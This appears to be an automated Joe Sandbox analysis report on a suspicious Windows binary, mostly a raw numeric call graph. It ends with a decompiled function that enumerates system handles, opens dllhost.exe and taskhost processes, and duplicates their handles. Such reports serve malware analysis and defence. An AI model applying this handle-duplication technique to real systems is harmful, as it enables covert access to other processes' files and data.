memcpy 38074->38075 38075->38009 38076->38048 38077->37993 38079 432d65 38078->38079 38080 432d58 38078->38080 38079->38002 38473 432cc4 memset memset memcpy 38080->38473 38082->38013 38083->38010 38084->38013 38085->37993 38103 41703f 38086->38103 38088 43847a 38089 43848a 38088->38089 38090 43847e 38088->38090 38110 438270 38089->38110 38140 4446ea 11 API calls 38090->38140 38094 438488 38094->38026 38096 4384bb 38097 438270 134 API calls 38096->38097 38097->38094 38098->38018 38099->38028 38100->38024 38101->38018 38102->38018 38104 417044 38103->38104 38105 41705c 38103->38105 38109 417055 38104->38109 38142 416760 11 API calls 38104->38142 38106 417075 38105->38106 38143 41707a 11 API calls 38105->38143 38106->38088 38109->38088 38111 415a91 memset 38110->38111 38112 43828d 38111->38112 38113 438297 38112->38113 38114 438341 38112->38114 38116 4382d6 38112->38116 38115 415c7d 16 API calls 38113->38115 38144 44358f 38114->38144 38118 438458 38115->38118 38119 4382fb 38116->38119 38120 4382db 38116->38120 38118->38094 38141 424f26 123 API calls 38118->38141 38187 415c23 memcpy 38119->38187 38175 416935 38120->38175 38123 438305 38127 44358f 19 API calls 38123->38127 38129 438318 38123->38129 38124 4382e9 38183 415c7d 38124->38183 38126 438373 38133 438383 38126->38133 38188 4300e8 memset memset memcpy 38126->38188 38127->38129 38129->38126 38170 43819e 38129->38170 38131 4383f5 38136 438404 38131->38136 38137 43841c 38131->38137 38132 4383cd 38132->38131 38190 42453e 123 API calls 38132->38190 38133->38132 38189 415c23 memcpy 38133->38189 38139 416935 16 API calls 38136->38139 38138 416935 16 API calls 38137->38138 38138->38113 38139->38113 38140->38094 38141->38096 38142->38109 38143->38104 38145 4435be 38144->38145 38146 443676 38145->38146 38151 4436ce 38145->38151 38154 44366c 38145->38154 38168 44360c 38145->38168 38191 442ff8 38145->38191 38147 443758 38146->38147 38150 442ff8 19 API calls 38146->38150 38153 443737 38146->38153 38159 443775 38147->38159 38200 441409 memset 38147->38200 38149 442ff8 19 API calls 38149->38147 38150->38153 38156 4165ff 11 API calls 38151->38156 38153->38149 38199 4169a7 11 API calls 38154->38199 38155 4437be 38160 4437de 38155->38160 38202 416760 11 API calls 38155->38202 38156->38146 38159->38155 38201 415c56 11 API calls 38159->38201 38162 443801 38160->38162 38203 42463b memset memcpy 38160->38203 38161 443826 38205 43bd08 memset 38161->38205 38162->38161 38204 43024d memset 38162->38204 38167 443837 38167->38168 38206 43024d memset 38167->38206 38168->38129 38171 438246 38170->38171 38173 4381ba 38170->38173 38171->38126 38172 41f432 110 API calls 38172->38173 38173->38171 38173->38172 38222 41f638 104 API calls 38173->38222 38176 41693e 38175->38176 38182 41698e 38175->38182 38178 41694c 38176->38178 38223 422fd1 memset 38176->38223 38178->38182 38224 4165a0 38178->38224 38182->38124 38184 415c81 38183->38184 38186 415c9c 38183->38186 38185 416935 16 API calls 38184->38185 38184->38186 38185->38186 38186->38113 38187->38123 38188->38133 38189->38132 38190->38131 38197 442ffe 38191->38197 38192 443094 38221 4414a9 12 API calls 38192->38221 38196 443092 38196->38145 38197->38192 38197->38196 38207 4414ff 38197->38207 38219 4169a7 11 API calls 38197->38219 38220 441325 memset 38197->38220 38199->38146 38200->38147 38201->38155 38202->38160 38203->38162 38204->38161 38205->38167 38206->38167 38208 441539 38207->38208 38210 441547 38207->38210 38209 441575 38208->38209 38208->38210 38211 441582 38208->38211 38213 42fccf 18 API calls 38209->38213 38212 4418e2 38210->38212 38216 442bd4 38210->38216 38214 43275a 12 API calls 38211->38214 38215 4414a9 12 API calls 38212->38215 38217 4418ea 38212->38217 38213->38210 38214->38210 38215->38217 38216->38217 38218 441409 memset 38216->38218 38217->38197 38218->38216 38219->38197 38220->38197 38221->38196 38222->38173 38223->38178 38230 415cfe 38224->38230 38229 422b84 15 API calls 38229->38182 38234 415d23 __aullrem __aulldvrm 38230->38234 38237 41628e 38230->38237 38231 4163ca 38232 416422 10 API calls 38231->38232 38232->38237 38233 416172 memset 38233->38234 38234->38231 38234->38233 38235 416422 10 API calls 38234->38235 38236 415cb9 10 API calls 38234->38236 38234->38237 38235->38234 38236->38234 38238 416520 38237->38238 38239 416527 38238->38239 38243 416574 38238->38243 38240 415700 10 API calls 38239->38240 38241 416544 38239->38241 38239->38243 38240->38241 38242 416561 memcpy 38241->38242 38241->38243 38242->38243 38243->38182 38243->38229 38274 41bc3b 38244->38274 38247 41edad 86 API calls 38248 41f1cb 38247->38248 38249 41f1f5 memcmp 38248->38249 38250 41f20e 38248->38250 38254 41f282 38248->38254 38249->38250 38251 41f21b memcmp 38250->38251 38250->38254 38252 41f326 38251->38252 38255 41f23d 38251->38255 38253 41ee6b 86 API calls 38252->38253 38252->38254 38253->38254 38254->38037 38255->38252 38256 41f28e memcmp 38255->38256 38298 41c8df 56 API calls 38255->38298 38256->38252 38257 41f2a9 38256->38257 38257->38252 38260 41f308 38257->38260 38261 41f2d8 38257->38261 38259 41f269 38259->38252 38262 41f287 38259->38262 38263 41f27a 38259->38263 38260->38252 38303 4446ce 11 API calls 38260->38303 38264 41ee6b 86 API calls 38261->38264 38262->38256 38265 41ee6b 86 API calls 38263->38265 38266 41f2e0 38264->38266 38265->38254 38299 41b1ca 38266->38299 38269->38037 38270->38037 38271->38037 38272->38031 38273->38032 38275 41bc54 38274->38275 38283 41be0b 38274->38283 38277 41bd61 38275->38277 38275->38283 38285 41bc8d 38275->38285 38304 41baf0 55 API calls 38275->38304 38279 41be45 38277->38279 38313 41a25f memset 38277->38313 38279->38247 38279->38254 38281 41be04 38311 41aee4 56 API calls 38281->38311 38283->38277 38312 41ae17 34 API calls 38283->38312 38284 41bd42 38284->38277 38284->38281 38286 41bdd8 memset 38284->38286 38287 41bdba 38284->38287 38285->38277 38285->38284 38289 41bd18 38285->38289 38305 4151e3 38285->38305 38288 41bde7 memcmp 38286->38288 38297 4175ed 6 API calls 38287->38297 38288->38281 38291 41bdfd 38288->38291 38289->38277 38289->38284 38309 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38289->38309 38290 41bdcc 38290->38277 38290->38288 38310 41a1b0 memset 38291->38310 38297->38290 38298->38259 38300 41b1e4 38299->38300 38302 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38300->38302 38363 41a1b0 memset 38300->38363 38302->38254 38303->38252 38304->38285 38314 41837f 38305->38314 38308 444706 11 API calls 38308->38289 38309->38284 38310->38281 38311->38283 38312->38277 38313->38279 38315 4183c1 38314->38315 38316 4183ca 38314->38316 38361 418197 25 API calls 38315->38361 38319 4151f9 38316->38319 38335 418160 38316->38335 38319->38289 38319->38308 38320 4183e5 38320->38319 38344 41739b 38320->38344 38323 418444 CreateFileW 38325 418477 38323->38325 38324 41845f CreateFileA 38324->38325 38326 4184c2 memset 38325->38326 38327 41847e GetLastError free 38325->38327 38347 418758 38326->38347 38328 4184b5 38327->38328 38329 418497 38327->38329 38362 444706 11 API calls 38328->38362 38331 41837f 49 API calls 38329->38331 38331->38319 38336 41739b GetVersionExW 38335->38336 38337 418165 38336->38337 38339 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38337->38339 38340 418178 38339->38340 38341 41817f 38340->38341 38342 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38340->38342 38341->38320 38343 418188 free 38342->38343 38343->38320 38345 4173d6 38344->38345 38346 4173ad GetVersionExW 38344->38346 38345->38323 38345->38324 38346->38345 38348 418680 43 API calls 38347->38348 38349 418782 38348->38349 38350 418506 free 38349->38350 38351 418160 11 API calls 38349->38351 38350->38319 38352 418799 38351->38352 38352->38350 38353 41739b GetVersionExW 38352->38353 38354 4187a7 38353->38354 38355 4187da 38354->38355 38356 4187ad GetDiskFreeSpaceW 38354->38356 38357 4187ec GetDiskFreeSpaceA 38355->38357 38360 4187e8 38355->38360 38359 418800 free 38356->38359 38357->38359 38359->38350 38360->38357 38361->38316 38362->38319 38363->38302 38399 424f07 38364->38399 38366 4251e4 38367 4251f7 38366->38367 38368 4251e8 38366->38368 38407 4250f8 38367->38407 38406 4446ea 11 API calls 38368->38406 38370 4251f2 38370->38048 38372 425209 38375 425249 38372->38375 38378 4250f8 127 API calls 38372->38378 38379 425287 38372->38379 38415 4384e9 135 API calls 38372->38415 38416 424f74 124 API calls 38372->38416 38373 415c7d 16 API calls 38373->38370 38375->38379 38417 424ff0 13 API calls 38375->38417 38378->38372 38379->38373 38380 425266 38380->38379 38418 415be9 memcpy 38380->38418 38382->38075 38383->38048 38384->38048 38385->38048 38386->38048 38387->38048 38388->38066 38389->38050 38391 4442eb 38390->38391 38394 444303 38390->38394 38471 41707a 11 API calls 38391->38471 38393 4442f2 38393->38394 38472 4446ea 11 API calls 38393->38472 38394->38056 38396 444300 38396->38056 38397->38064 38398->38074 38400 424f1f 38399->38400 38401 424f0c 38399->38401 38420 424eea 11 API calls 38400->38420 38419 416760 11 API calls 38401->38419 38404 424f18 38404->38366 38405 424f24 38405->38366 38406->38370 38408 425108 38407->38408 38414 42510d 38407->38414 38453 424f74 124 API calls 38408->38453 38411 42516e 38413 415c7d 16 API calls 38411->38413 38412 425115 38412->38372 38413->38412 38414->38412 38421 42569b 38414->38421 38415->38372 38416->38372 38417->38380 38418->38379 38419->38404 38420->38405 38433 4256f1 38421->38433 38449 4259c2 38421->38449 38426 4260dd 38465 424251 120 API calls 38426->38465 38427 4259da 38464 416760 11 API calls 38427->38464 38431 422aeb memset memcpy memcpy 38431->38433 38432 429a4d 38434 429a66 38432->38434 38435 429a9b 38432->38435 38433->38427 38433->38431 38433->38432 38437 4260a1 38433->38437 38447 429ac1 38433->38447 38433->38449 38452 425a38 38433->38452 38454 4227f0 memset memcpy 38433->38454 38455 422b84 15 API calls 38433->38455 38456 422b5d memset memcpy memcpy 38433->38456 38457 422640 13 API calls 38433->38457 38459 4241fc 11 API calls 38433->38459 38460 42413a 90 API calls 38433->38460 38466 415c56 11 API calls 38434->38466 38439 429a96 38435->38439 38468 416760 11 API calls 38435->38468 38463 415c56 11 API calls 38437->38463 38469 424251 120 API calls 38439->38469 38441 429a7a 38467 416760 11 API calls 38441->38467 38448 425ad6 38447->38448 38470 415c56 11 API calls 38447->38470 38448->38411 38449->38448 38458 415c56 11 API calls 38449->38458 38452->38449 38461 422640 13 API calls 38452->38461 38462 4226e0 12 API calls 38452->38462 38453->38414 38454->38433 38455->38433 38456->38433 38457->38433 38458->38427 38459->38433 38460->38433 38461->38452 38462->38452 38463->38427 38464->38426 38465->38448 38466->38441 38467->38439 38468->38439 38469->38447 38470->38427 38471->38393 38472->38396 38473->38079 38474->37960 38475->37960 40377 4148b6 FindResourceW 40378 4148f9 40377->40378 40379 4148cf SizeofResource 40377->40379 40379->40378 40380 4148e0 LoadResource 40379->40380 40380->40378 40381 4148ee LockResource 40380->40381 40381->40378 37848 415304 free 40383 441b3f 40393 43a9f6 40383->40393 40385 441b61 40566 4386af memset 40385->40566 40387 44189a 40388 4418e2 40387->40388 40392 442bd4 40387->40392 40390 4418ea 40388->40390 40567 4414a9 12 API calls 40388->40567 40392->40390 40568 441409 memset 40392->40568 40394 43aa20 40393->40394 40395 43aadf 40393->40395 40394->40395 40396 43aa34 memset 40394->40396 40395->40385 40397 43aa56 40396->40397 40398 43aa4d 40396->40398 40569 43a6e7 40397->40569 40577 42c02e memset 40398->40577 40403 43aad3 40579 4169a7 11 API calls 40403->40579 40404 43aaae 40404->40395 40404->40403 40419 43aae5 40404->40419 40405 43ac18 40408 43ac47 40405->40408 40581 42bbd5 memcpy memcpy memcpy memset memcpy 40405->40581 40409 43aca8 40408->40409 40582 438eed 16 API calls 40408->40582 40412 43acd5 40409->40412 40584 4233ae 11 API calls 40409->40584 40585 423426 11 API calls 40412->40585 40413 43ac87 40583 4233c5 16 API calls 40413->40583 40417 43ace1 40586 439811 163 API calls 40417->40586 40418 43a9f6 161 API calls 40418->40419 40419->40395 40419->40405 40419->40418 40580 439bbb 22 API calls 40419->40580 40421 43acfd 40427 43ad2c 40421->40427 40587 438eed 16 API calls 40421->40587 40423 43ad19 40588 4233c5 16 API calls 40423->40588 40424 43ad58 40589 44081d 163 API calls 40424->40589 40427->40424 40430 43add9 40427->40430 40429 43ae3a memset 40431 43ae73 40429->40431 40430->40430 40593 423426 11 API calls 40430->40593 40594 42e1c0 147 API calls 40431->40594 40432 43adab 40591 438c4e 163 API calls 40432->40591 40435 43ad6c 40435->40395 40435->40432 40590 42370b memset memcpy memset 40435->40590 40436 43adcc 40592 440f84 12 API calls 40436->40592 40437 43ae96 40595 42e1c0 147 API calls 40437->40595 40441 43aea8 40442 43aec1 40441->40442 40596 42e199 147 API calls 40441->40596 40443 43af00 40442->40443 40597 42e1c0 147 API calls 40442->40597 40443->40395 40447 43af1a 40443->40447 40448 43b3d9 40443->40448 40598 438eed 16 API calls 40447->40598 40453 43b3f6 40448->40453 40454 43b4c8 40448->40454 40450 43b60f 40450->40395 40657 4393a5 17 API calls 40450->40657 40451 43af2f 40599 4233c5 16 API calls 40451->40599 40639 432878 12 API calls 40453->40639 40463 43b4f2 40454->40463 40645 42bbd5 memcpy memcpy memcpy memset memcpy 40454->40645 40456 43af51 40600 423426 11 API calls 40456->40600 40459 43af7d 40601 423426 11 API calls 40459->40601 40646 43a76c 21 API calls 40463->40646 40464 43b529 40647 44081d 163 API calls 40464->40647 40465 43b462 40641 423330 11 API calls 40465->40641 40466 43af94 40602 423330 11 API calls 40466->40602 40470 43b47e 40475 43b497 40470->40475 40642 42374a memcpy memset memcpy memcpy memcpy 40470->40642 40471 43b544 40476 43b55c 40471->40476 40648 42c02e memset 40471->40648 40472 43b428 40472->40465 40640 432b60 16 API calls 40472->40640 40473 43afca 40603 423330 11 API calls 40473->40603 40643 4233ae 11 API calls 40475->40643 40649 43a87a 163 API calls 40476->40649 40477 43afdb 40604 4233ae 11 API calls 40477->40604 40483 43b56c 40486 43b58a 40483->40486 40650 423330 11 API calls 40483->40650 40484 43b4b1 40644 423399 11 API calls 40484->40644 40485 43afee 40605 44081d 163 API calls 40485->40605 40651 440f84 12 API calls 40486->40651 40491 43b4c1 40653 42db80 163 API calls 40491->40653 40493 43b592 40652 43a82f 16 API calls 40493->40652 40496 43b5b4 40654 438c4e 163 API calls 40496->40654 40498 43b5cf 40655 42c02e memset 40498->40655 40500 43b005 40500->40395 40504 43b01f 40500->40504 40606 42d836 163 API calls 40500->40606 40501 43b1ef 40616 4233c5 16 API calls 40501->40616 40504->40501 40614 423330 11 API calls 40504->40614 40615 42d71d 163 API calls 40504->40615 40505 43b212 40617 423330 11 API calls 40505->40617 40506 43b087 40607 4233ae 11 API calls 40506->40607 40507 43add4 40507->40450 40656 438f86 16 API calls 40507->40656 40512 43b22a 40618 42ccb5 11 API calls 40512->40618 40514 43b23f 40619 4233ae 11 API calls 40514->40619 40515 43b10f 40610 423330 11 API calls 40515->40610 40517 43b257 40620 4233ae 11 API calls 40517->40620 40521 43b129 40611 4233ae 11 API calls 40521->40611 40522 43b26e 40621 4233ae 11 API calls 40522->40621 40525 43b09a 40525->40515 40608 42cc15 19 API calls 40525->40608 40609 4233ae 11 API calls 40525->40609 40526 43b282 40622 43a87a 163 API calls 40526->40622 40528 43b13c 40612 440f84 12 API calls 40528->40612 40530 43b29d 40623 423330 11 API calls 40530->40623 40533 43b15f 40613 4233ae 11 API calls 40533->40613 40534 43b2af 40536 43b2b8 40534->40536 40537 43b2ce 40534->40537 40624 4233ae 11 API calls 40536->40624 40625 440f84 12 API calls 40537->40625 40540 43b2c9 40627 4233ae 11 API calls 40540->40627 40541 43b2da 40626 42370b memset memcpy memset 40541->40626 40544 43b2f9 40628 423330 11 API calls 40544->40628 40546 43b30b 40629 423330 11 API calls 40546->40629 40548 43b325 40630 423399 11 API calls 40548->40630 40550 43b332 40631 4233ae 11 API calls 40550->40631 40552 43b354 40632 423399 11 API calls 40552->40632 40554 43b364 40633 43a82f 16 API calls 40554->40633 40556 43b370 40634 42db80 163 API calls 40556->40634 40558 43b380 40635 438c4e 163 API calls 40558->40635 40560 43b39e 40636 423399 11 API calls 40560->40636 40562 43b3ae 40637 43a76c 21 API calls 40562->40637 40564 43b3c3 40638 423399 11 API calls 40564->40638 40566->40387 40567->40390 40568->40392 40570 43a6f5 40569->40570 40572 43a765 40569->40572 40570->40572 40658 42a115 40570->40658 40572->40395 40578 4397fd memset 40572->40578 40575 43a73d 40575->40572 40576 42a115 147 API calls 40575->40576 40576->40572 40577->40397 40578->40404 40579->40395 40580->40419 40581->40408 40582->40413 40583->40409 40584->40412 40585->40417 40586->40421 40587->40423 40588->40427 40589->40435 40590->40432 40591->40436 40592->40507 40593->40429 40594->40437 40595->40441 40596->40442 40597->40442 40598->40451 40599->40456 40600->40459 40601->40466 40602->40473 40603->40477 40604->40485 40605->40500 40606->40506 40607->40525 40608->40525 40609->40525 40610->40521 40611->40528 40612->40533 40613->40504 40614->40504 40615->40504 40616->40505 40617->40512 40618->40514 40619->40517 40620->40522 40621->40526 40622->40530 40623->40534 40624->40540 40625->40541 40626->40540 40627->40544 40628->40546 40629->40548 40630->40550 40631->40552 40632->40554 40633->40556 40634->40558 40635->40560 40636->40562 40637->40564 40638->40507 40639->40472 40640->40465 40641->40470 40642->40475 40643->40484 40644->40491 40645->40463 40646->40464 40647->40471 40648->40476 40649->40483 40650->40486 40651->40493 40652->40491 40653->40496 40654->40498 40655->40507 40656->40450 40657->40395 40659 42a175 40658->40659 40661 42a122 40658->40661 40659->40572 40664 42b13b 147 API calls 40659->40664 40661->40659 40662 42a115 147 API calls 40661->40662 40665 43a174 40661->40665 40689 42a0a8 147 API calls 40661->40689 40662->40661 40664->40575 40679 43a196 40665->40679 40680 43a19e 40665->40680 40666 43a306 40666->40679 40694 4388c4 14 API calls 40666->40694 40668 42ff8c 139 API calls 40668->40680 40669 42a115 147 API calls 40669->40680 40670 415a91 memset 40670->40680 40671 43a642 40671->40679 40698 4169a7 11 API calls 40671->40698 40673 4165ff 11 API calls 40673->40680 40675 43a635 40697 42c02e memset 40675->40697 40679->40661 40680->40666 40680->40668 40680->40669 40680->40670 40680->40673 40680->40679 40690 439504 13 API calls 40680->40690 40691 4312d0 147 API calls 40680->40691 40692 42be4c memcpy memcpy memcpy memset memcpy 40680->40692 40693 43a121 11 API calls 40680->40693 40682 43a325 40682->40671 40682->40675 40682->40679 40683 4169a7 11 API calls 40682->40683 40684 42b5b5 memset memcpy 40682->40684 40685 42bf4c 14 API calls 40682->40685 40688 4165ff 11 API calls 40682->40688 40695 42b63e 14 API calls 40682->40695 40696 42bfcf memcpy 40682->40696 40683->40682 40684->40682 40685->40682 40688->40682 40689->40661 40690->40680 40691->40680 40692->40680 40693->40680 40694->40682 40695->40682 40696->40682 40697->40671 40698->40679 40725 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37683 425711 37674->37683 37688 425ad6 37675->37688 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37682 4260dd 37737 424251 120 API calls 37682->37737 37683->37675 37685 4259da 37683->37685 37691 422aeb memset memcpy memcpy 37683->37691 37692 429a4d 37683->37692 37695 4260a1 37683->37695 37706 4259c2 37683->37706 37709 425a38 37683->37709 37726 4227f0 memset memcpy 37683->37726 37727 422b84 15 API calls 37683->37727 37728 422b5d memset memcpy memcpy 37683->37728 37729 422640 13 API calls 37683->37729 37731 4241fc 11 API calls 37683->37731 37732 42413a 90 API calls 37683->37732 37736 416760 11 API calls 37685->37736 37691->37683 37693 429a66 37692->37693 37697 429a9b 37692->37697 37739 415c56 11 API calls 37693->37739 37735 415c56 11 API calls 37695->37735 37698 429a96 37697->37698 37741 416760 11 API calls 37697->37741 37742 424251 120 API calls 37698->37742 37700 429a7a 37740 416760 11 API calls 37700->37740 37706->37688 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37683 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37683 37727->37683 37728->37683 37729->37683 37730->37685 37731->37683 37732->37683 37733->37709 37734->37709 37735->37685 37736->37682 37737->37688 37738->37683 37739->37700 37740->37698 37741->37698 37742->37675 37743->37685 37745 41fbf1 37744->37745 37746 41fbf8 37744->37746 37749 41fc39 37745->37749 37768 4446ce 11 API calls 37745->37768 37758 41ee26 37746->37758 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37763 41ee3c 37763->37745 37766 41ee58 37766->37763 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37763 37773 41eb85 11 API calls 37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37834 41bf99 86 API calls 37775->37834 37776->37763 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37786 41be8c 37779->37786 37799 418c63 37779->37799 37813 4446ce 11 API calls 37780->37813 37782 41be69 37782->37763 37782->37773 37784 41bee7 37784->37782 37817 41a453 86 API calls 37784->37817 37786->37782 37786->37784 37787 41bf3a 37786->37787 37788 41bed1 37786->37788 37816 4446ce 11 API calls 37787->37816 37790 41bef0 37788->37790 37793 41bee2 37788->37793 37790->37784 37791 41bf01 37790->37791 37792 41bf24 memset 37791->37792 37794 41bf14 37791->37794 37814 418a6d memset memcpy memset 37791->37814 37792->37782 37803 41ac13 37793->37803 37815 41a223 memset memcpy memset 37794->37815 37798 41bf20 37798->37792 37802 418c72 37799->37802 37800 418d51 memset memset 37801 418c94 37800->37801 37801->37786 37802->37800 37802->37801 37804 41ac52 37803->37804 37805 41ac3f memset 37803->37805 37808 41ac6a 37804->37808 37818 41dc14 19 API calls 37804->37818 37806 41acd9 37805->37806 37806->37784 37809 41aca1 37808->37809 37819 41519d 37808->37819 37809->37806 37811 41acc0 memset 37809->37811 37812 41accd memcpy 37809->37812 37811->37806 37812->37806 37813->37782 37814->37794 37815->37798 37816->37784 37818->37808 37822 4175ed 37819->37822 37830 417570 SetFilePointer 37822->37830 37825 41760a ReadFile 37826 417637 37825->37826 37827 417627 GetLastError 37825->37827 37828 4151b3 37826->37828 37829 41763e memset 37826->37829 37827->37828 37828->37809 37829->37828 37831 4175b2 37830->37831 37832 41759c GetLastError 37830->37832 37831->37825 37831->37828 37832->37831 37833 4175a8 GetLastError 37832->37833 37833->37831 37834->37776 37835 417bc5 37837 417c61 37835->37837 37841 417bda 37835->37841 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37841 37839 417c2c 37839->37841 37847 41851e 20 API calls 37839->37847 37841->37836 37841->37837 37841->37839 37842 4175b7 37841->37842 37843 4175d6 CloseHandle 37842->37843 37844 4175c8 37843->37844 37845 4175df 37843->37845 37844->37845 37846 4175ce Sleep 37844->37846 37845->37841 37846->37843 37847->37839 40368 4147f3 40371 414561 40368->40371 40370 414813 40372 41456d 40371->40372 40373 41457f GetPrivateProfileIntW 40371->40373 40376 4143f1 memset _itow WritePrivateProfileStringW 40372->40376 40373->40370 40375 41457a 40375->40370 40376->40375

                                                                                                                                            Executed Functions

                                                                                                                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                            • API String ID: 708747863-3398334509
                                                                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
